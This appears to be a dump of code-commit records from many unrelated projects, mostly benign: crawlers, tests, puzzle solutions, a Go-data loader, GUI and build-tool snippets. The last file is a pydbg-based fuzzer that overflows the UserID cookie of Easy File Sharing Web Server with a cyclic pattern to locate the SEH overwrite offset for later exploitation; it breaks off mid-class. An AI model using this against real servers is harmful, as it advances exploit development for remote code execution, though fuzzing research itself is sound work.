    connection.close()
# Script entry point: read the school list from the spreadsheet, crawl each
# school's Baike page and store parsed records in MySQL.
if __name__ == '__main__':
    connection = open_mysql()
    schoolnames = read_school_names("D:/采集.xlsx")
    # Alternative mode: dump raw page text to files instead of the DB.
    # for schoolname in schoolnames:
    #     crawl_text(schoolname)
    for schoolname in schoolnames:
        try:
            school = crawl(schoolname)
            # Only keep records where at least the name was parsed.
            if school is not None and school.name != "":
                insert_to_mysql(school, connection)
                logging.info(school.name)
        except:
            # Keep the batch going even if a single school fails.
            pass
    close_mysql(connection)
| Python | 0.000267 | |
9469bcf60a199b96d1fec778c44346df744a1d60 | add jieba | jieba/test_jieba.py | jieba/test_jieba.py | #!/usr/bin/env python
# encoding=utf-8
import jieba
seg_list = jieba.cut("我来到北京清华大学", cut_all=True)
print("Full Mode: " + "/ ".join(seg_list)) # 全模式
seg_list = jieba.cut("我来到北京清华大学", cut_all=False)
print("Default Mode: " + "/ ".join(seg_list)) # 精确模式
seg_list = jieba.cut("他来到了网易杭研大厦") # 默认是精确模式
print(", ".join(seg_list))
# 搜索引擎模式
seg_list = jieba.cut_for_search("小明硕士毕业于中国科学院计算所,后在日本京都大学深造")
print(", ".join(seg_list))
| Python | 0.999974 | |
291e7c8b2a69f26f6343269aaac2b9e3cd517220 | Add tests | readthedocs/proxito/tests/test_proxied_api.py | readthedocs/proxito/tests/test_proxied_api.py | from readthedocs.rtd_tests.tests.test_footer import TestFooterHTML
from django.test import override_settings
@override_settings(ROOT_URLCONF='readthedocs.proxito.urls')
class TestProxiedFooterHTML(TestFooterHTML):
    """Re-run the footer HTML suite through the proxito URL configuration."""

    def setUp(self):
        super().setUp()
        # Requests are issued against the proxied docs domain.
        self.host = 'pip.readthedocs.io'

    def render(self):
        # Same request as the base suite, routed by the Host header.
        return self.client.get(self.url, HTTP_HOST=self.host)
| Python | 0.00001 | |
081b5aabae205ad7c23c512be15ee26276dc8a29 | Check whether Azure CLI is in ARM mode | perfkitbenchmarker/providers/azure/util.py | perfkitbenchmarker/providers/azure/util.py | # Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Verify that Azure CLI is in arm mode."""
from perfkitbenchmarker import events
from perfkitbenchmarker import providers
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers import azure
class BadAzureCLIModeError(Exception):
  """Raised when the Azure CLI does not report ARM (Resource Manager) mode."""
  pass
def _CheckAzureCLIMode(sender):
  """Raise BadAzureCLIModeError unless `azure config` reports ARM mode."""
  assert sender == providers.AZURE, sender
  stdout, _ = vm_util.IssueRetryableCommand(
      [azure.AZURE_PATH, 'config'])
  if 'Current Mode: arm' not in stdout:
    raise BadAzureCLIModeError('Azure CLI may not be in ARM mode.')
# Run the check whenever the Azure provider module is imported; weak=False
# keeps a strong reference to the handler.
events.provider_imported.connect(_CheckAzureCLIMode, providers.AZURE,
                                 weak=False)
| Python | 0 | |
95a86efeadc15f3edc83cbfe64c6d725b1eaf0bd | revert unneeded None checks | web/scripts/load_agagd_data.py | web/scripts/load_agagd_data.py | from app.models import db, Game, GoServer, Player, User
from app.tokengen import generate_token
from flask.ext.script import Command, Option
from scripts.parsing import agagd_parser, pin_change_parser
from uuid import uuid4
"""Script which loads game and user data from an AGAGD SQL dump and file with PIN changes."""
def create_server(name):
    """Create and commit a GoServer row named *name*; return its database id."""
    server = GoServer()
    server.name = name
    server.url = ''
    server.token = generate_token()
    db.session.add(server)
    db.session.commit()
    return server.id
class AGAHistoricalGamesLoader(Command):
    """Class which holds a little bit of state used while loading the AGAGD data."""
    option_list = (
        Option('--sql_dump', '-d', dest='agagd_dump_filename'),
        Option('--pin_changes', '-p', dest='pin_change_dump_filename')
    )
    def setup(self, pin_change_dump_filename):
        """Stand-in for __init__ because we don't have necessary information
        at construction time, and we are constructed regardless of whether
        this script is being run or not.
        """
        name = 'AGA'
        # Reuse the existing 'AGA' GoServer row, or create it on first run.
        server = db.session.query(GoServer).filter_by(name=name).first()
        if server:
            self.server_id = server.id
        else:
            print('Creating AGA Server object')
            self.server_id = create_server(name)
        # Cache of AGA id -> User, so each player is created at most once.
        self._users = {}
        # map: old_pin -> new_pin
        with open(pin_change_dump_filename) as f:
            self._pin_changes = {line['old']: line['new'] for line in pin_change_parser(f)
                                 if line['old'] != line['new']}  # Prevents infinite lookup loops
    def get_or_make_user(self, aga_id):
        """Gets or creates a fake User object for an AGA ID,
        along with an AGA player
        If the AGA ID has had one or more PIN changes, the most recent ID will
        be used.
        """
        # Follow the PIN-change chain to the newest id.
        while aga_id in self._pin_changes:
            aga_id = self._pin_changes[aga_id]
        if aga_id in self._users:
            return self._users[aga_id]
        else:
            # fake=True marks placeholder accounts; a uuid keeps email unique.
            user = User(aga_id=aga_id, email=uuid4(), fake=True)
            db.session.add(user)
            db.session.commit()
            player = Player(id=aga_id, name='', user_id=user.id, server_id=self.server_id, token=uuid4())
            db.session.add(player)
            self._users[aga_id] = user
            return user
    def store_game(self, row):
        """Add a Game row built from one parsed AGAGD record (not committed here)."""
        user1 = self.get_or_make_user(row['Pin_Player_1'])
        user2 = self.get_or_make_user(row['Pin_Player_2'])
        # Color_1 says which of the two pins played white.
        white_user, black_user = (user1, user2) if row['Color_1'] == 'W' else (user2, user1)
        game = Game(id=row['Game_ID'],
                    server_id=self.server_id,
                    white_id=white_user.aga_id,
                    black_id=black_user.aga_id,
                    date_played=row['Game_Date'],
                    date_reported=row['Game_Date'],
                    result=row['Result'],
                    rated=row['Rated'],
                    handicap=row['Handicap'],
                    komi=row['Komi'])
        db.session.add(game)
    def load_data(self, filename):
        """Stream games from the AGAGD dump, committing every 1000 rows."""
        # server_id = create_server()
        with open(filename) as f:
            for i, row in enumerate(agagd_parser(f)):
                if i % 1000 == 0:
                    print('-Loading row', i)
                    db.session.commit()
                    print('Committed', i)
                self.store_game(row)
    def run(self, agagd_dump_filename, pin_change_dump_filename):
        """Entry point: load PIN changes, import all games, commit the tail."""
        self.setup(pin_change_dump_filename)
        self.load_data(agagd_dump_filename)
        db.session.commit()
| from app.models import db, Game, GoServer, Player, User
from app.tokengen import generate_token
from flask.ext.script import Command, Option
from scripts.parsing import agagd_parser, pin_change_parser
from uuid import uuid4
"""Script which loads game and user data from an AGAGD SQL dump and file with PIN changes."""
def create_server(name):
server = GoServer()
server.name = name
server.url = ''
server.token = generate_token()
db.session.add(server)
db.session.commit()
return server.id
class AGAHistoricalGamesLoader(Command):
"""Class which holds a little bit of state used while loading the AGAGD data."""
option_list = (
Option('--sql_dump', '-d', dest='agagd_dump_filename'),
Option('--pin_changes', '-p', dest='pin_change_dump_filename')
)
def setup(self, pin_change_dump_filename):
"""Stand-in for __init__ because we don't have necessary information
at construction time, and we are constructed regardless of whether
this script is being run or not.
"""
name = 'AGA'
server = db.session.query(GoServer).filter_by(name=name).first()
if server:
self.server_id = server.id
else:
print('Creating AGA Server object')
self.server_id = create_server(name)
self._users = {}
# map: old_pin -> new_pin
with open(pin_change_dump_filename) as f:
self._pin_changes = {line['old']: line['new'] for line in pin_change_parser(f)
if line['old'] != line['new']} # Prevents infinite lookup loops
def get_or_make_user(self, aga_id):
"""Gets or creates a fake User object for an AGA ID,
along with an AGA player
If the AGA ID has had one or more PIN changes, the most recent ID will
be used.
"""
while aga_id in self._pin_changes:
if self._pin_changes[aga_id] is None:
print ("Pin would change to none: %s" % aga_id)
aga_id = self._pin_changes[aga_id]
if aga_id in self._users:
return self._users[aga_id]
else:
user = User(aga_id=aga_id, email=uuid4(), fake=True)
db.session.add(user)
db.session.commit()
player = Player(id=aga_id, name='', user_id=user.id, server_id=self.server_id, token=uuid4())
db.session.add(player)
self._users[aga_id] = user
return user
def store_game(self, row):
if row['Pin_Player_1'] is None or row['Pin_Player_2'] is None:
print(row)
user1 = self.get_or_make_user(row['Pin_Player_1'])
user2 = self.get_or_make_user(row['Pin_Player_2'])
white_user, black_user = (user1, user2) if row['Color_1'] == 'W' else (user2, user1)
game = Game(id=row['Game_ID'],
server_id=self.server_id,
white_id=white_user.aga_id,
black_id=black_user.aga_id,
date_played=row['Game_Date'],
date_reported=row['Game_Date'],
result=row['Result'],
rated=row['Rated'],
handicap=row['Handicap'],
komi=row['Komi'])
db.session.add(game)
def load_data(self, filename):
# server_id = create_server()
with open(filename) as f:
for i, row in enumerate(agagd_parser(f)):
if i % 1000 == 0:
print('-Loading row', i)
db.session.commit()
print('Committed', i)
self.store_game(row)
def run(self, agagd_dump_filename, pin_change_dump_filename):
self.setup(pin_change_dump_filename)
self.load_data(agagd_dump_filename)
db.session.commit()
| Python | 0.000005 |
59edefb410b932a648347f76ca9a96013b40a08e | Add solution 303 | Problem_300_399/euler_303.py | Problem_300_399/euler_303.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''
Problem 303
For a positive integer n, define f(n) as the least positive multiple of n that, written in base 10, uses only digits ≤ 2.
Thus f(2)=2, f(3)=12, f(7)=21, f(42)=210, f(89)=1121222.
Also, . n = 1 ~ 100, f(n)/n = 11363107
Find . n = 1 ~ 10000, f(n)/n = ?
'''
from itertools import cycle, product
from functools import reduce
'''
mul = [ [1],
[1, 1, 8],
[1, 4, 1, 4],
[4, 3, 3],
[3, 2, 3, 2],
[2],
[2, 3, 2, 3],
[3, 3, 4],
[4, 1, 4, 1],
[8, 1, 1]]
def digit_012_check(n):
while n != 0:
d, m = divmod(n, 10)
if m > 2:
return False
n = d
return True
def fn(n):
if digit_012_check(n):
print([n], '-', 1, n)
return 1
#mul = [ [0, 1, 2, 3, 4, 5, 6, 7, 8, 9],
# [0, 1, 2],
# [0, 1, 5, 6],
# [0, 4, 7],
# [0, 3, 5, 8],
# [0, 2, 4, 6, 8],
# [0, 2, 5, 7,],
# [0, 3, 6],
# [0, 4, 5, 9],
# [0, 8, 9]]
j = 0
for i in cycle(mul[n % 10]):
j += i
m = n * j
if digit_012_check(m):
print([n], i, j, m)
return j
'''
def p303():  # Answer: 1111981904675169, pretty awful though
    """Project Euler 303: sum f(n)//n for n = 1..10000, where f(n) is the
    least positive multiple of n whose decimal digits are all <= 2.

    Brute force: enumerate 30-digit strings over {0,1,2} (leading zeros
    cover the shorter candidates) and record the first multiple found for
    each n.  The two stubborn cases 9990 and 9999 are precomputed by hand.
    """
    L = 10000 + 1
    check = [x for x in range(3, L)]  # values of n still missing an f(n)
    result = [0] * L                  # result[n] will hold f(n)
    result[0] = 1
    result[1] = 1
    result[2] = 2
    # run and check only 9990
    # Found 111333555778 * 9990 = 1112222222222220
    result[9990] = 1112222222222220
    # by hand
    # 9990 answer -> 111333555778
    # attach [1] -> 1111333555778
    # attach [3] -> 11113333555778
    # attach [5] -> 111133335555778
    # attach [7] -> 1111333355557778
    # found -> 1111333355557778
    result[9999] = 11112222222222222222
    check.remove(9990)
    check.remove(9999)
    # NOTE(review): relies on product() yielding digit strings in increasing
    # numeric order so the first divisible hit is the least multiple — confirm.
    for i in product([0, 1, 2], repeat=30):
        n = int(reduce(lambda x, y: str(x) + str(y), i))
        temp = []
        for c in check:
            if n % c == 0:
                if n == 0:
                    break
                result[c] = n
                temp.append(c)
                # print([n], c, len(check), check)
        # Remove satisfied n outside the scan to avoid mutating while iterating.
        for t in temp:
            check.remove(t)
        if 0 not in result:
            break
    total = 0
    for i in range(1, len(result)):
        # print([i], result[i])
        total += result[i] // i
    print(total)
# Run on import/execution.
p303()
| Python | 0.999003 | |
6705e0e23d13a94726556714e11dfbb7a916877d | Add basic mechanism to override the default EntryAdmin | zinnia_wymeditor/admin.py | zinnia_wymeditor/admin.py | """EntryAdmin for zinnia-wymeditor"""
from django.contrib import admin
from zinnia.models import Entry
from zinnia.admin.entry import EntryAdmin
class EntryAdminWYMEditorMixin(object):
    """
    Mixin intended to attach WYMEditor for editing the Entry.content field.
    Currently a placeholder with no behavior of its own.
    """
    pass
class EntryAdminWYMEditor(EntryAdminWYMEditorMixin,
                          EntryAdmin):
    """
    Enrich the default EntryAdmin with WYMEditor.
    """
    pass
# Swap Zinnia's stock EntryAdmin registration for the WYMEditor-enabled one.
admin.site.unregister(Entry)
admin.site.register(Entry, EntryAdminWYMEditor)
| Python | 0.000001 | |
6193786bb2307550ab9dfb9c218f6d8b3f407156 | Create is-graph-bipartite.py | Python/is-graph-bipartite.py | Python/is-graph-bipartite.py | # Time: O(|V| + |E|)
# Space: O(|V|)
# Given a graph, return true if and only if it is bipartite.
#
# Recall that a graph is bipartite if we can split it's set of nodes into
# two independent subsets A and B such that every edge in the graph has
# one node in A and another node in B.
#
# The graph is given in the following form: graph[i] is a list of indexes j
# for which the edge between nodes i and j exists.
# Each node is an integer between 0 and graph.length - 1.
# There are no self edges or parallel edges: graph[i] does not contain i,
# and it doesn't contain any element twice.
#
# Example 1:
# Input: [[1,3], [0,2], [1,3], [0,2]]
# Output: true
# Explanation:
# The graph looks like this:
# 0----1
# | |
# | |
# 3----2
# We can divide the vertices into two groups: {0, 2} and {1, 3}.
#
# Example 2:
# Input: [[1,2,3], [0,2], [0,1,3], [0,2]]
# Output: false
# Explanation:
# The graph looks like this:
# 0----1
# | \ |
# | \ |
# 3----2
# We cannot find a way to divide the set of nodes into two independent ubsets.
#
# Note:
# - graph will have length in range [1, 100].
# - graph[i] will contain integers in range [0, graph.length - 1].
# - graph[i] will not contain i or duplicate values.
class Solution(object):
    def isBipartite(self, graph):
        """
        Return True iff the adjacency-list graph is bipartite.

        Iterative DFS two-coloring: start each uncolored component with
        color 0 and give neighbors the opposite color (XOR with 1); an edge
        whose endpoints share a color disproves bipartiteness.

        :type graph: List[List[int]]
        :rtype: bool
        """
        color = {}
        # range(), not xrange(): xrange is Python 2-only and raises
        # NameError on Python 3.
        for node in range(len(graph)):
            if node in color:
                continue  # already colored as part of an earlier component
            stack = [node]
            color[node] = 0
            while stack:
                curr = stack.pop()
                for neighbor in graph[curr]:
                    if neighbor not in color:
                        stack.append(neighbor)
                        color[neighbor] = color[curr] ^ 1
                    elif color[neighbor] == color[curr]:
                        return False
        return True
| Python | 0.000326 | |
3204227799ce5f7a7d0df4cb6b480b42d6cdae1f | Add a snippet. | python/pyqt/pyqt5/widget_QPainter_OpenGL.py | python/pyqt/pyqt5/widget_QPainter_OpenGL.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# See https://doc.qt.io/archives/4.6/opengl-2dpainting.html
import sys
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QPainter, QBrush, QPen
from PyQt5.QtCore import Qt
from PyQt5.QtOpenGL import QGLWidget
class MyPaintWidget(QGLWidget):
    """QGLWidget that draws 2D ellipses with QPainter over an OpenGL surface."""
    def __init__(self):
        super().__init__()
        # Set window background color
        self.setAutoFillBackground(True)
        palette = self.palette()
        palette.setColor(self.backgroundRole(), Qt.white)
        self.setPalette(palette)
    def paintEvent(self, event):
        """Repaint handler: one filled ellipse and one cross-hatched ellipse."""
        qp = QPainter(self)
        qp.setPen(QPen(Qt.black, 5, Qt.SolidLine))
        qp.setBrush(QBrush(Qt.red, Qt.SolidPattern))
        qp.setRenderHint(QPainter.Antialiasing) # <- Set anti-aliasing See https://wiki.python.org/moin/PyQt/Painting%20and%20clipping%20demonstration
        qp.drawEllipse(100, 15, 400, 200)
        qp.setBrush(QBrush(Qt.red, Qt.DiagCrossPattern))
        qp.drawEllipse(600, 15, 200, 200)
# Script entry point: create the Qt application and show the widget.
if __name__ == '__main__':
    app = QApplication(sys.argv)
    widget = MyPaintWidget()
    widget.show()
    # The mainloop of the application. The event handling starts from this point.
    # The exec_() method has an underscore because exec is a Python keyword; exec_() is used instead.
    exit_code = app.exec_()
    # sys.exit() ensures a clean exit and informs the environment how the
    # application ended.
    sys.exit(exit_code)
| Python | 0.000002 | |
ae3bd406736f9235b442c52bf584a97d0760a588 | add api | buildbot_travis/api.py | buildbot_travis/api.py | # Copyright 2012-2013 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from buildbot import config
from klein import Klein
from twisted.internet import defer
from twisted.internet import threads
import yaml
import json
from buildbot.util.eventual import eventually
def getDbConfigObjectId(master, name="config"):
    """Return (as a Deferred) the state object id used for DbConfig storage."""
    return master.db.state.getObjectId(name, "DbConfig")
class Api(object):
    """Klein-based HTTP API for reading and updating the travis configuration.

    GET  /config  -> current configuration as JSON.
    PUT  /config  -> persist the new configuration, validate it by loading the
                     master config, roll back on errors, else reconfig.
    """
    app = Klein()
    _yamlPath = None
    _useDbConfig = False
    _in_progress = False

    def __init__(self, ep):
        self.ep = ep

    def setYamlPath(self, path):
        """Persist future config saves to this YAML file."""
        self._yamlPath = path

    def useDbConfig(self):
        """Also persist future config saves into the master's DB state."""
        self._useDbConfig = True

    def setCfg(self, cfg):
        """Record the currently active configuration; clears the busy flag."""
        self._cfg = cfg
        self._in_progress = False

    @defer.inlineCallbacks
    def saveCfg(self, cfg):
        """Write *cfg* to the YAML file and/or the database, as configured."""
        if self._yamlPath is not None:
            cfg = yaml.safe_dump(cfg, default_flow_style=False, indent=4)
            with open(self._yamlPath, "w") as f:
                f.write(cfg)
        if self._useDbConfig:
            oid = yield getDbConfigObjectId(self.ep.master)
            yield self.ep.master.db.state.setState(oid, "travis", cfg)

    @app.route("/config", methods=['GET'])
    def getConfig(self, request):
        """Return the active configuration as a JSON string."""
        return json.dumps(self._cfg)

    def thdCheckConfig(self):
        # Runs in a worker thread: reload the master config and report errors.
        try:
            config.MasterConfig.loadConfig(self.ep.master.basedir, self.ep.master.configFileName)
        # "except E as e" replaces the Python 2-only "except E, e" syntax,
        # which is a SyntaxError on Python 3; both spellings work on 2.6+.
        except config.ConfigErrors as e:
            return e.errors
        return None

    @app.route("/config", methods=['PUT'])
    @defer.inlineCallbacks
    def saveConfig(self, request):
        """I save the config, and run check_config, potentially returning errors"""
        request.setHeader('Content-Type', 'application/json')
        if self._in_progress:
            defer.returnValue(json.dumps({'success': False, 'errors': ['reconfig already in progress']}))
        self._in_progress = True
        cfg = json.loads(request.content.read())
        if cfg != self._cfg:
            yield self.saveCfg(cfg)
        try:
            err = yield threads.deferToThread(self.thdCheckConfig)
        except Exception as e:
            err = [repr(e)]
        if err is not None:
            # Validation failed: restore the previous configuration on disk/DB.
            self._in_progress = False
            yield self.saveCfg(self._cfg)
            defer.returnValue(json.dumps({'success': False, 'errors': err}))
        yield self.ep.master.reconfig()
        defer.returnValue(json.dumps({'success': True}))
| Python | 0 | |
d19ab50f2d3b259bd6c5cfb21b4087ca4d3ec248 | create theano 2 | theanoTUT/theano2_install.py | theanoTUT/theano2_install.py | # View more python tutorials on my Youtube and Youku channel!!!
# Youtube video tutorial: https://www.youtube.com/channel/UCdyjiB5H8Pu7aDTNVXTTpcg
# Youku video tutorial: http://i.youku.com/pythontutorial
# 2 - Install theano
"""
requirements:
1. python 2 >=2.6 or python 3>=3.3
2. Numpy >= 1.7.1
3. Scipy >=0.11
If using CPU, no other requirement.
But if using GPU, you will need NVIDIA CUDA drivers and SDK.
The must easy way to install theano is to use pip install.
1. open your terminal (MacOS and Linux), or your command window (Windows)
2. type "pip install theano" (for python 2x); type "pip3 install theano" (for python 3x)
Note: to install theano on Windows machine may be a little bit stuggling. If you encounter any
problem, please refer to this web page:
http://deeplearning.net/software/theano/install_windows.html#install-windows
""" | Python | 0 | |
389adca1fd52747814f370de2d066a1743544469 | Solve Game Time in python | solutions/beecrowd/1046/1046.py | solutions/beecrowd/1046/1046.py | start, end = map(int, input().split())
if start == end:
result = 24
elif end - start >= 0:
result = end - start
else:
result = 24 + end - start
print(f'O JOGO DUROU {result} HORA(S)')
| Python | 0.999996 | |
3a9627f31846e06e04d7ae933712840d52616663 | Create main.py | main.py | main.py | import pygame
import game
file = 'music.mp3'
pygame.init()
pygame.mixer.init()
pygame.mixer.music.load(file)
pygame.mixer.music.play(loops=-1)
pygame.mixer.music.set_volume(0.5)
run = True
SuperHeroTower = game.Game()
while run:
run = SuperHeroTower.startScreen()
pygame.quit()
quit()
| Python | 0.000001 | |
8cf6b638a7f3bf229526451076dc27e990be5391 | increase hyperparam grid for TransE in FB15K (margin) | scripts/fb15k/UCL_FB15K_adv_v1.1.py | scripts/fb15k/UCL_FB15K_adv_v1.1.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import itertools
import os.path
import sys
import argparse
import logging
def cartesian_product(dicts):
    """Lazily yield one dict per element of the cross product of the value lists.

    Each yielded dict pairs every key of *dicts* with one choice taken from
    that key's list of candidate values.
    """
    keys = list(dicts)
    for combo in itertools.product(*dicts.values()):
        yield dict(zip(keys, combo))
def summary(configuration):
kvs = sorted([(k, v) for k, v in configuration.items()], key=lambda e: e[0])
return '_'.join([('%s=%s' % (k, v)) for (k, v) in kvs])
def to_cmd(c, _path=None):
if _path is None:
_path = '/home/pminervi/workspace/inferbeddings/'
command = 'python3 {}/bin/adv-cli.py' \
' --train {}/data/fb15k/freebase_mtr100_mte100-train.txt' \
' --valid {}/data/fb15k/freebase_mtr100_mte100-valid.txt' \
' --test {}/data/fb15k/freebase_mtr100_mte100-test.txt' \
' --clauses {}/data/fb15k/clauses/clauses_0.999.pl' \
' --nb-epochs {}' \
' --lr {}' \
' --nb-batches {}' \
' --model {}' \
' --similarity {}' \
' --margin {}' \
' --embedding-size {}' \
' --adv-lr {} --adv-init-ground --adversary-epochs {}' \
' --discriminator-epochs {} --adv-weight {} --adv-batch-size {}' \
''.format(_path, _path, _path, _path, _path,
c['epochs'], c['lr'], c['batches'],
c['model'], c['similarity'],
c['margin'], c['embedding_size'],
c['adv_lr'], c['adv_epochs'],
c['disc_epochs'], c['adv_weight'], c['adv_batch_size'])
return command
def to_logfile(c, path):
outfile = "%s/ucl_fb15k_adv_v1.1.%s.log" % (path, summary(c))
return outfile
def main(argv):
def formatter(prog):
return argparse.HelpFormatter(prog, max_help_position=100, width=200)
argparser = argparse.ArgumentParser('Generating experiments for the UCL cluster', formatter_class=formatter)
argparser.add_argument('--debug', '-D', action='store_true', help='Debug flag')
argparser.add_argument('--path', '-p', action='store', type=str, default=None, help='Path')
args = argparser.parse_args(argv)
hyperparameters_space = dict(
epochs=[100],
optimizer=['adagrad'],
lr=[.1],
batches=[10],
model=['TransE'],
similarity=['l1', 'l2'],
margin=[2, 5, 10],
embedding_size=[20, 50, 100, 150, 200],
adv_lr=[.1],
adv_epochs=[0, 1, 10],
disc_epochs=[1, 10],
adv_weight=[0, 1, 10, 100, 1000, 10000],
adv_batch_size=[1, 10, 100]
)
configurations = cartesian_product(hyperparameters_space)
path = '/home/pminervi/workspace/inferbeddings/logs/ucl_fb15k_adv_v1.1/'
if not os.path.exists(path):
os.makedirs(path)
for job_id, cfg in enumerate(configurations):
logfile = to_logfile(cfg, path)
completed = False
if os.path.isfile(logfile):
with open(logfile, 'r', encoding='utf-8', errors='ignore') as f:
content = f.read()
completed = '### MICRO (test filtered)' in content
if not completed:
line = '{} >> {} 2>&1'.format(to_cmd(cfg, _path=args.path), logfile)
if args.debug:
print(line)
else:
file_name = 'ucl_fb15k_adv_v1.1_{}.job'.format(job_id)
alias = ''
job_script = '#$ -S /bin/bash\n' \
'#$ -wd /home/pminervi/workspace/jobs/\n' \
'#$ -l h_vmem=8G,tmem=8G\n' \
'#$ -l h_rt=48:00:00\n' \
'{}\n{}\n'.format(alias, line)
with open(file_name, 'w') as f:
f.write(job_script)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main(sys.argv[1:])
| Python | 0 | |
bc3f7e83bd35f1a6ae8add35932513c7da47076e | fix a typo. | restclients/test/util/datetime_convertor.py | restclients/test/util/datetime_convertor.py | from django.test import TestCase
from datetime import date, datetime
from restclients.util.datetime_convertor import convert_to_begin_of_day,\
convert_to_end_of_day
class DatetimeConvertorTest(TestCase):
    """Tests for the begin/end-of-day datetime conversion helpers."""
    def test_convert_to_begin_of_day(self):
        # Both a date and a datetime should map to midnight of the same day.
        self.assertEquals(convert_to_begin_of_day(date(2013, 4, 9)),
                          datetime(2013, 4, 9, 0, 0, 0))
        self.assertEquals(
            convert_to_begin_of_day(datetime(2013, 4, 9, 10, 10, 10)),
            datetime(2013, 4, 9, 0, 0, 0))
    def test_convert_to_end_of_day(self):
        # "End of day" is midnight of the *following* day; Feb 28 2012 rolls
        # over to the leap day Feb 29.
        self.assertEquals(convert_to_end_of_day(date(2012, 2, 28)),
                          datetime(2012, 2, 29, 0, 0, 0))
        self.assertEquals(
            convert_to_end_of_day(datetime(2012, 2, 28, 10, 10, 10)),
            datetime(2012, 2, 29, 0, 0, 0))
| from django.test import TestCase
from datetime import date, datetime
from restclients.util.datetime_convertor import convert_to_begin_of_day,\
convert_to_end_of_day
class DatetimeConvertorTest(TestCase):
def test_convert_to_begin_of_day(self):
self.assertEquals(convert_to_begin_of_day(date(2013, 4, 9)),
datetime(2013, 4, 9, 0, 0, 0))
self.assertEquals(
convert_to_begin_of_day(datetime(2013, 4, 9, 10, 10, 10)),
datetime(2013, 4, 9, 0, 0, 0))
def test_convert_to_end_of_day(self):
self.assertEquals(convert_to_end_of_day(date(2012, 2, 28)),
datetime(2013, 2, 29, 0, 0, 0))
self.assertEquals(
convert_to_end_of_day(datetime(2012, 2, 28, 10, 10, 10)),
datetime(2012, 2, 29, 0, 0, 0))
| Python | 0.03285 |
3b4f7b9792be0315aca7d71fafe1a972e5fd87f7 | Add Seh_bug_fuzzer.py | SEH_Fuzzer/Seh_bug_fuzzer.py | SEH_Fuzzer/Seh_bug_fuzzer.py | # -*- coding: utf-8 -*-
import time
import sys
import socket
import cPickle
import os
from pydbg import *
from pydbg.defines import *
from util import *
PICKLE_NAME = "fsws_phase1.pkl"
exe_path = "D:\\testPoc\\Easy File Sharing Web Server\\fsws.exe"
import threading
import time
host, port = "127.0.0.1", 80
global Running
global Crash
global lock
global chance
global MAX_OFFSET
global OFFSET
chance = 2
Running = True
Crash = False
lock = threading.Lock()
def check_access_validation(dbg):
    """pydbg callback for access-violation events.

    Each first-chance hit decrements the retry budget (`chance`); when it
    reaches zero the crash details (SEH record, pattern offset, pickled
    state and a register/stack dump) are written out and the target is
    killed.  Returns DBG_EXCEPTION_NOT_HANDLED on every path.
    """
    global chance
    global Running
    global lock
    with lock:
        if dbg.dbg.u.Exception.dwFirstChance:
            chance -= 1
            # prevent test next size.
            Running = False
            if chance==0:
                Running = False
                # First record of the unwound SEH chain.
                seh, nseh = dbg.seh_unwind()[0]
                seh_offset = pattern_find(seh, MAX_OFFSET)
                print "[+] crash in %d words" % OFFSET
                print "[+] seh offset %s." % seh_offset
                # Persist the findings for the follow-up phase.
                with open(PICKLE_NAME, "wb") as phase_file:
                    cPickle.dump(OFFSET, phase_file)
                    cPickle.dump(seh_offset, phase_file)
                    cPickle.dump(seh, phase_file)
                    cPickle.dump(nseh, phase_file)
                with open("crash.txt", "w") as f:
                    f.write("seh: 0x%08x\n" % seh)
                    f.write("nseh: 0x%08x\n" % nseh)
                    f.write(dbg.dump_context(stack_depth=1000))
                dbg.terminate_process()
                return DBG_EXCEPTION_NOT_HANDLED
            else:
                Running = True
                return DBG_EXCEPTION_NOT_HANDLED
    return DBG_EXCEPTION_NOT_HANDLED
class Fuzzer(object):
    """Drives the SEH fuzzing session: one thread runs the target under
    pydbg, a second feeds it HTTP requests with a growing cookie payload."""
    def __init__(self, exe_path, max_offset = 8000):
        self.exe_path = exe_path
        self.pid = None
        self.dbg = None
        global MAX_OFFSET
        MAX_OFFSET = max_offset
        # self.running = True
        self.dbgThread = threading.Thread(target=self.start_debugger)
        self.dbgThread.setDaemon(False)
        self.dbgThread.start()
        # Wait debugger start process
        while self.pid is None:
            time.sleep(1)
        self.monitorThread = threading.Thread(target=self.monitor_debugger)
        self.monitorThread.setDaemon(False)
        self.monitorThread.start()
    def monitor_debugger(self):
        """Send requests whose UserID cookie is a pattern_create() payload
        that grows by 100 bytes per round, until a crash is recorded or
        MAX_OFFSET is reached."""
        global Running
        global OFFSET
        test_words = 0
        raw_input("[+] Please start the debugger...")
        while Running and MAX_OFFSET>test_words:
            # The crash callback flips Running under the same lock.
            with lock:
                if not Running:
                    break
            test_words += 100
            OFFSET = test_words
            print "[+] test %d words" % test_words
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            buffer = pattern_create(test_words)
            httpreq = (
                "GET /changeuser.ghp HTTP/1.1\r\n"
                "User-Agent: Mozilla/4.0\r\n"
                "Host:" + host + ":" + str(port) + "\r\n"
                "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
                "Accept-Language: en-us\r\n"
                "Accept-Encoding: gzip, deflate\r\n"
                "Referer: http://" + host + "/\r\n"
                "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
                "Conection: Keep-Alive\r\n\r\n"
                )
            s.send(httpreq)
            s.close()
            # prevent execute to fast.
            time.sleep(1)
        # The pickle file only exists if the crash callback fired.
        if not os.path.isfile(PICKLE_NAME):
            print "[+] No found bug."
            Running = False
            self.dbg.terminate_process()
        else:
            print "[+] Find bug."
    '''
    Try to start debugger and run it.
    '''
